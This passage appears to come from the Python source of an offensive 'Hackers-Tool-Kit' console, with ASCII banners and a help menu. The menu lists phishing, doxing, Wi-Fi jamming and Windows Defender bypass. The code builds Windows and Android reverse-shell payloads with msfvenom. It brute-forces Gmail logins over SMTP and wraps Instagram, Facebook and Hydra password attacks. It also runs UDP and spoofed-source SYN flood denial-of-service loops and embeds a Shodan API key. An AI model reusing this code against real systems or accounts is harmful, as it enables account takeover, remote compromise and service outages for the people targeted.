██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,17) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +nano : open nano text editor +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP 